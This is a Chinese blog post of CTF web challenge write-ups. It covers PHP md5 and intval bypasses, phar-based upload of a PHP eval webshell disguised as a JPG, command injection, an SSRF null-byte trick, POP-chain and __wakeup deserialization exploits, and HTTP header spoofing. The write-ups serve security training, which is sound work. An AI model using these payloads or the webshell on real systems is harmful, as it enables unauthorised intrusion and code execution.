暑期大杂烩

最新推荐文章于 2024-09-28 00:15:00 发布
最新推荐文章于 2024-09-28 00:15:00 发布
阅读量528 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ytl_storm/article/details/133770313
版权

[NSSCTF 2022 Spring Recruit]babyphp

代码审计+md5
<?php
highlight_file(__FILE__);
include_once('flag.php');
if(isset($_POST['a'])&&!preg_match('/[0-9]/',$_POST['a'])&&intval($_POST['a'])){
    if(isset($_POST['b1'])&&$_POST['b2']){
        if($_POST['b1']!=$_POST['b2']&&md5($_POST['b1'])===md5($_POST['b2'])){
            if($_POST['c1']!=$_POST['c2']&&is_string($_POST['c1'])&&is_string($_POST['c2'])&&md5($_POST['c1'])==md5($_POST['c2'])){
                echo $flag;
            }else{
                echo "yee";
            }
        }else{
            echo "nop";
        }
    }else{
        echo "go on";
    }
}else{
    echo "let's get some php";
}
?> let's get some php

intval() 函数用于获取变量的整数值。

a—要求不匹配数字且整数值不为0

b—md5弱相等

c—md5弱相等且为字符串:科学计数法绕过

可以传入两个md5加密后是0e开头的字符串,需要注意的地方是,这个以0e开头的字符串只能是纯数字,这样php在进行科学计算法的时候才会将它转化为0;可以查找以0e开头md5加密相等的字符串,也可以自己编写代码
byGcY 0e591948146966052067035298880982
QNKCDZO 0e830400451993494058024219903391
s878926199a 0e545993274517709034328855841020
s155964671a 0e342768416822451524974117254469

payload:a[]=1&b1[]=1&b2[]=2&c1=byGcY&c2=QNKCDZO

[GDOUCTF 2023]EZ WEB

FLASK+代码审计+PUT

点击没啥用

在这里插入图片描述

源代码

<!DOCTYPE html>
<html>
<head>
<title>index</title>
<script>
  function start() {
    alert("Where's the flag? i swear it was around here somewhere");
  }
</script>
</head>
<body>
<button onclick='start()'>click me for the flag</button>
<!-- /src -->
</body>
</html>

提示访问/src

得到

import flask

app = flask.Flask(__name__)

@app.route('/', methods=['GET'])
def index():
  return flask.send_file('index.html')

@app.route('/src', methods=['GET'])
def source():
  return flask.send_file('app.py')

@app.route('/super-secret-route-nobody-will-guess', methods=['PUT'])
def flag():
  return open('flag').read()

用burp传put包

在这里插入图片描述

[NISACTF 2022]bingdundun~

文件上传+文件包含(phar)

1.注意观察,首先给出了一个链接,点进去后可以发现两个页面都存在//index.php,而且 url 多了一个参数bingdundun,疑似文件包含,改成?bingdundun=index试试
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

  1. 可以发现直接套娃起来了,那么可以推测出是在后面加上.php,然后进行文件包含。

  2. 接着上传 shell 文件试试,bp 抓包 fuzz 后可以发现对文件后缀名有严格限制,而且也不能上传配置文件,那么既不能上传 php 文件,也不能包含非 php 文件( \x00 的截断在 php>5.3.4 就没用了,而且还要考虑 GPC ,所以是比较鸡肋的方法)。其实我们可以通过 zip 协议和 phar 协议来包含文件。这道题似乎 zip 协议包含不成功。

  3. phar ( php archive ) 是 PHP 里类似于 jar ( java archive ) 的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,那么 .phar 后缀文件是默认开启支持的,你不需要任何其他的安装就可以使用它。而phar://的伪协议,可以将任意后缀名的压缩包(原来是 .phar 或 .zip,注意:PHP > =5.3.0 压缩包需要是zip协议压缩,rar不行 ) 解包,从而可以通过上传压缩包绕过对后缀名的限制,再利用伪协议实现文件包含。

  4. 因此先要生成一个压缩包文件,这里就有两个方向,一是生成zip文件,可以直接将一句话木马压缩为 .zip 文件;二是生成 phar 文件

    注意:默认phar扩展是只读模式,需要手动配置php.ini中phar.readonly= Off
    且无法用ini_set修改

6.这里给出参考代码,运行后可在目录下发现生成的 shell.phar 文件,为了绕过上传文件后缀名限制,需要修改文件名为 shell.jpg

<?php
    $payload = '<?php eval($_POST[]); ?>';   //一句话木马
    $phar = new Phar("shell.phar");  // 后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>");  // 设置stub
    $phar->addFromString("1.php", "$payload");  // 添加要压缩的文件
    // $phar->setMetadata(...);  // 在metadata添加内容,可参考 phar反序列化,此处用不着,故注释
    $phar->stopBuffering();
?>

7.上传后利用phar://伪协议读取文件

在这里插入图片描述

[LitCTF 2023]Vim yyds

vim+代码审计

题目提示vim了

那就访问/.index.php.swp下载得到swp文件

1.用记事本或010打开,找到关键代码

在这里插入图片描述

2.或者git bash here 利用 vim -r index.php.swp 命令 恢复index.php文件

在这里插入图片描述

然后构造payload:cmd=cat /flag&password=R2l2ZV9NZV9Zb3VyX0ZsYWc=即可

[GKCTF 2020]cve版签到

在这里插入图片描述

%00截断

在这里插入图片描述

意思是url以.ctfhub.com结尾

1.可用开发者工具中的网络看到提示:flag in localhost(打开后空白则刷新一下)

在这里插入图片描述

2.也可以直接抓包

在这里插入图片描述

点击链接后

在这里插入图片描述

url中多了点东西

根据提示构造一下?url=http://127.0.0.1%00.ctfhub.com

在这里插入图片描述

host用123结尾

?url=http://127.0.0.123%00.ctfhub.com

在这里插入图片描述

[HNCTF 2022 Week1]2048

游戏型js分析

源代码中找到js文件搜索alert

在这里插入图片描述

根据代码做出改动并ctrl+S保存

在这里插入图片描述

接着敲击回车

在这里插入图片描述

[NISACTF 2022]popchains

php反序列化+pop链
    Happy New Year~ MAKE A WISH
    <?php

    echo 'Happy New Year~ MAKE A WISH<br>';

    if(isset($_GET['wish'])){
        @unserialize($_GET['wish']);
    }
    else{
        $a=new Road_is_Long;
        highlight_file(__FILE__);
    }
    /***************************pop your 2022*****************************/

    class Road_is_Long{
        public $page;#4Road_is_Long
        public $string;#3Make_a_Change
        public function __construct($file='index.php'){
            $this->page = $file;
        }
        public function __toString(){
            return $this->string->page;
        }

        public function __wakeup(){
            if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
                echo "You can Not Enter 2022";
                $this->page = "index.php";
            }
        }
    }

    class Try_Work_Hard{
        protected  $var;#1shell
        public function append($value){
            include($value);
        }
        public function __invoke(){
            $this->append($this->var);
        }
    }

    class Make_a_Change{
        public $effort;
        public function __construct(){
            $this->effort = array();
        }

        public function __get($key){
            $function = $this->effort;
            return $function();
        }
    }
    /**********************Try to See flag.php*****************************/

1.先找出口,显然就是include文件包含漏洞,可以看到__invoke中调用了append,故而给var备注#1shell

2.然后__invoke在尝试以调用函数的方式调用对象的时候,就会被调用

故找到$function(),结合上一行代码给effort备注#2Try_Work_Hard

3.接着__get():读取不可访问或者不存在的属性的时候,进行赋值

往上找到$this->string->page,给string标记为#3Make_a_Change

4.__toString():把类当成字符串的时候调用,一般在echo处生效

这里显然不是echo,不过可以看到正则匹配时用到了$this->page,故给page标记#4Road_is_Long

5.__wakeup():反序列化的时候调用

那么就是自动调用

思路理好后就可以写payload了

<?php
class Road_is_Long{
    public $page;
    public $string;
}

class Try_Work_Hard{
    protected  $var="/flag";
}

class Make_a_Change{
    public $effort;
}

$a1=new Road_is_Long();
$a2=new Road_is_Long();
$b=new Make_a_Change();
$c=new Try_Work_Hard();

$a1->page=$a2;
$a2->string=$b;
$b->effort=$c;

echo urlencode(serialize($a1));
?>

CNSS

[Baby] Webpack

网页检索webpack漏洞

webpack 源码泄露_webpack漏洞_Luckysec的博客-CSDN博客

根据引导可知“使用webpack打包应用程序会在网站js同目录下生成 js.map文件“,即我们要下载该文件

在这里插入图片描述

找到源码文件main.c91fb7d1.js

加上.map后缀访问下载得到文件main.c91fb7d1.js.map

用记事本打开ctrl+F搜索cnss

在这里插入图片描述

[Easy] ezhttp

http请求头修改

什么,你真的会http请求吗?CNSS娘决定考考你

#初始包
GET /Index HTTP/1.1
Host: 124.221.34.13:50005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

1.只接受CNSS请求

GET改为CNSS

2.只能在安卓微信内置浏览器中请求

网络检索一下:

微信内置:
android:
Mozilla/5.0 (Linux; Android 5.1; OPPO R9tm Build/LMY47I; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043220 Safari/537.36 MicroMessenger/6.5.7.1041 NetType/4G Language/zh_CN

把user-agent改一下

3.只接受来自cnss.io的请求

在host下一行添加 referer:cnss.io

4.只接受来自本机的请求

在referer下一行添加 x-forwarded-for:127.0.0.1

5.只接受uestc.edu.cn域名的请求

修改host

6.只接受内容类型为application/json的请求

这里注意 accept是自己接受的内容类型,content-type是自己发出的内容类型(对方接受的内容类型)

所以添加content-type

7.不接受内容长度为0的请求

在最下面加点内容

8.你倒是发个json过来啊

将加的内容改为json:{}

9.能告诉我你的名字(name)吗?

添加 “name”:“123”

10.能告诉我你的密码(password)吗?

添加 “password”:“123”

11.能在cookie中写入你的名字(name)吗?

cookie:name=123

p.s. 这里的名字密码需与前面一致

12.能在Cookie中写入你的密码(password)吗?

cookie:name=123;password=123

13.BasicAuth验证失败

HTTP Basic Auth:使用和Postman 测试_basic auth postman_过河的小卒子的博客-CSDN博客

authorization:Basic MTIzOjEyMw==

14.返回flag

在这里插入图片描述

🤨 [Easy] ezunserialize

php反序列化+不可见字符
<?php
error_reporting(0);
show_source(__FILE__);
include "flag.php";

class CNSS
{
    public $username;
    private $i_want2_say;
    protected $password;

    function __wakeup()
    {
        $this->username = 'guest';
        $this->i_want2_say = 'i_like_web';
        $this->password = '123456';
        echo "<br/> wake up! <br/>";
    }

    function __destruct()
    {
        echo "destruct<br />";
        if ($this->username === 'admin' && $this->password === 'ctf' && $this->i_want2_say === '‮⁦fssmsl⁩⁦i_like_web') { //wtf 
            global $flag;
            echo $flag;
        } else
            echo "you are 2 baby la<br/>";
    }
}

unserialize($_GET['web']);
?>

将代码复制到vscode中就会发现wtf处存在不可见字符

构建起来很简单

<?php
error_reporting(0);
show_source(__FILE__);
include "flag.php";

class CNSS
{
    public $username='admin';
    private $i_want2_say='‮⁦fssmsl⁩⁦i_like_web';
    protected $password='ctf';

    function __wakeup()
    {
        $this->username = 'guest';
        $this->i_want2_say = 'i_like_web';
        $this->password = '123456';
    }

    function __destruct()
    {
        if ($this->username === 'admin' && $this->password === 'ctf' && $this->i_want2_say === '‮⁦fssmsl⁩⁦i_like_web') { //wtf 
            global $flag;
            echo $flag;
        }     }
}

$a=new CNSS();
echo urlencode(serialize($a));
?>

输出为O%3A4%3A%22CNSS%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22admin%22%3Bs%3A17%3A%22%00CNSS%00i_want2_say%22%3Bs%3A28%3A%22%E2%80%AE%E2%81%A6fssmsl%E2%81%A9%E2%81%A6i_like_web%22%3Bs%3A11%3A%22%00%2A%00password%22%3Bs%3A3%3A%22ctf%22%3B%7D

不过这样还不能得到flag

在这里插入图片描述

原因是存在__wakeup方法,该方法会在unserialize时自动调用,这会改变我们的赋值

因此,我们需要绕过,方法很简单:序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

因此只要将O:4:“CNSS”:3:{s:8:“username”;s:5:“admin”;s:17:"(由于存在不可见字符,因此序列化后直接输出会存在字符丢失,必须url编码后输出才能完整)CNSS后的3改大一些就能绕过

O%3A4%3A%22CNSS%22%3A4%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22admin%22%3Bs%3A17%3A%22%00CNSS%00i_want2_say%22%3Bs%3A28%3A%22%E2%80%AE%E2%81%A6fssmsl%E2%81%A9%E2%81%A6i_like_web%22%3Bs%3A11%3A%22%00%2A%00password%22%3Bs%3A3%3A%22ctf%22%3B%7D

在这里插入图片描述

ytl_storm
关注
苦逼在校大学生,二本计算机专业,暑假找Java实习没人要,未来好迷茫啊
Java-面试
04-16 3111
憨憨专业 本人普通二本,专业是信息与计算科学这个天坑的专业(以为是计算机其实是统计+数学+大数据+一丢丢计算机的大杂烩),想必也有和我一样想学计算机而误入这个专业的同学,呜呜~~羡慕科班的,计算机四大专业课,我们专业就开过数据结构,欠的都是要还的,以后自己肯定得花大时间补这些了 觉醒学习Java 大一下学期开了java课(之前开过c,c++,python,matalb,后来又开过scala,hadoop,都是学了半学期,基本就是知道有这个东西的深度,不知道大家的课怎么样),本人因为前面有两个大学毕业的姐姐指
记录暑假java后端深度底层学习计划
一只程序小洋的博客
06-28 460
基础知识我把他分为两大部分: 1.后端通用基础知识: 计算机网络 (后端面试考查的重中之重,IP/TCP/UDP/HTTP相关协议等) (推荐书籍:《计算机网络,谢希仁第五版》 第4章到第7章网络安全必学,网络层与应用层,http协议是重中之...
0704暑假集训前的欢乐大杂烩总结
qq_44341728的博客
07-04 263
0704暑假集训前的欢乐大杂烩总结 在TM迎接暑假超级无敌20天happy乐的前夕来了一场巨多人的超级爽的欢乐赛 然而老刘的数据翻车了 (所以我们在这里就暂且不去论第5题) T1 --质因数分解 【正解】:我都不想说什么,爆0是最骚的。这么睿智的一道题我居然GG了,平时的板子要去多多复习啊。(话说我自己还写过相应的博客啪啪 ) 重点: 被分解的数在long long范围内 这题后来订正的时候,...
【知识点总结】【CSP考前复习】图论大杂烩【未完】
Cyan_rose
10-23 1026
OI生涯大汇总.jpg
2019届计算机专业-上海国企单位(银行、证券、通信)秋招经验大杂烩
weixin_34146410的博客
11-15 1905
2018年秋招结果 7、8月开始在银行官网各种申请,投递各个公司的简历,10月中旬开始跑宣讲会到11月中旬找到满意的工作,历时一个月,很辛苦,参加的宣讲会太多(国家开发银行、平安银行、中国银行...)就不一一介绍了,只介绍参加了笔试、面试的公司的基本流程和大致题型,给大家参考。 个人情况分析 本硕计算机:妹子一枚,边缘211,从大二开...
吾儿秘史--趣事糗事大杂烩第二季(2014.6.2-)-更新到2014年9月8日
weixin_33845881的博客
06-19 320
编者案:自开微博开始,@云界漫步 不时记录一些儿子的成长趣事糗事,为了更好的保存,特汇集在此。①本博客是《吾儿秘史》第二季始于2014年6月2日,目前在不断更新中。②《吾儿秘史》第一季已经封存,记录了2011年7月到2014年6月1日的所有《吾儿秘史》系列,访问地址http://virtualman.blog.51cto.com/200540/1128496#吾儿秘史#别了无锡,别了@无锡太湖皇冠...
农村大学生的逆袭009
柏颖漫谈
08-08 539
008 小雅哭了刘得强和业务部助理王世华因琶洲工程的意外被调回公司业务部,这让两人都感受到压力,虽然海之花公司方面并没有任何人跟这两人谈到什么问题,不过谁都知道两人或许一...
暑假汇思学培训游记
weixin_30607659的博客
07-24 145
暑假汇思学培训游记 考虑写一下七天的游记吧 OIer总是喜欢写点什么,或是捶胸顿足懊悔遗憾的退役记,或者划水乱膜的培训记,或是记录AFO前经历的美好回忆。 总而说之,大多是抱着遗憾,不甘和怒己不争的情感落笔的,而少有成功的经历。哪怕是成功,也仅仅是阶段性的,也许那就是自己的尽头了呢说不定? 这是一篇划水乱膜的培训记。先膜ouuan大爷一波。 Day 0 当天在去的火车上补了“学园孤岛”的前几集,然...
2024大中小学生暑假阅读书单来啦!分年级阅读推荐,值得(家长)收藏!!数理化全书单!...
图灵教育
07-12 159
暑假快到啦!!!暑假正是培养孩子阅读兴趣和阅读能力的大好时机,而数理思维更是需要大量的课外阅读来培养。北京市十一学校本部高中数学教师朱浩楠认为,学生在日常做习题不可或缺,因为这是锤炼能力、掌握知识的必要环节之一,但科普书的作用则是为了展示知识是如何推动人类文明前进的,以及展示在科学前进过程中,科学家们经历过的真实困难,或者通过有趣的开放问题,诱发读者创造性地使用现代科学范式去解决问题。数学自古希腊...
块转存哦
SueMagic
03-16 9984
java 23 种设计模 百度云下载地址: 链接: https://pan.baidu.com/s/1hsl9mNM 密码: ge 不限速下载地址: sync密钥:BRZOHW2MNM7Y3GEZQZPWG7AL6C3RDZBK iOS学习资料免费下 斯坦福大学公开课(200M) 链接: https://pan.baidu.com/s/1c3vKdXY 密码: tpq 学习资料打包一起(差不多1G...
奇安信 | 2021 校招笔试
记录的地平线
09-25 2177
20 选择 | 10 不定项 | 2 编程
题解 | #确定哪些订单购买了 prod_id...#
2301_79125431的博客
04-18 666
主要是问科研项目,八股涉及很少,然后让我复盘了机考[牛泪],手撕加汽油,没手撕出来讲了思路。各位大佬帮忙看看,为什么在Boss上投完简历,就没然后了,之前有几个公司要我线下面试,然后太远了,我。楼主只考虑武汉,终极二选一了公积金都是12%,浪潮6险一金,双休,hr说晚上6,7点基本下班。25届选手,还没找到暑期实习,目前面了几家,基本上感觉是面完已经寄了,有没有点击就送的实习啊,不能转。途游游戏,科锐国际(计算机类),得物,蓝禾,奇安信,顺丰,康冠科技,金证科技24春招内推①得物【岗位。
嵌入式软件工程师_程序人生一名嵌入式软件工程师的成长总结
weixin_39723010的博客
12-06 3399
哈喽,我是老吴。今天分享一篇18年毕业生的总结文。文章于首发于[嵌入式大杂烩] (2019-10-16)。文章里干货多多,各位慢慢品读吧。一、我的工作经历 1.1 第一家公司 1.2 第二家公司 1.3 第三家公司二、小、中、大公司的特点 2.1 小公司 2.2 中等公司 2.3 大公司三、实习、校招、社招 3.1 关于实习 3.2 关于校...
网络安全详解
weidl001的博客
09-21 1504
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
网络安全全方略
AI逍遥子
09-25 1291
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
信息安全工程师(24)网络安全体系建设原则与安全策略
最新发布
m0_73399576的博客
09-28 803
信息安全工程师——网络安全体系建设原则与安全策略篇
Linux 网络安全守护:构建安全防线的最佳实践
weixin_62641226的博客
09-23 1018
通过定期更新系统、强化用户权限管理、配置防火墙、使用SSH安全连接、定期备份数据、监控系统日志以及安装安全工具,用户可以有效提升Linux系统的安全性,构建坚固的网络安全防线。Linux系统通常内置了防火墙工具,如`iptables`和`firewalld`。用户应根据实际需求,设置合适的规则,限制不必要的端口和服务。可以使用`rsync`、`tar`等工具进行备份,确保在发生安全事件时能够快速恢复。此外,定期审查用户账户和权限,及时删除不再使用的账户,确保只有必要的用户能够访问系统。
Web安全-SQL注入之联合查询注入
m0_60984906的博客
09-25 333
Web安全SQL注入之联合查询注入墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符型)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值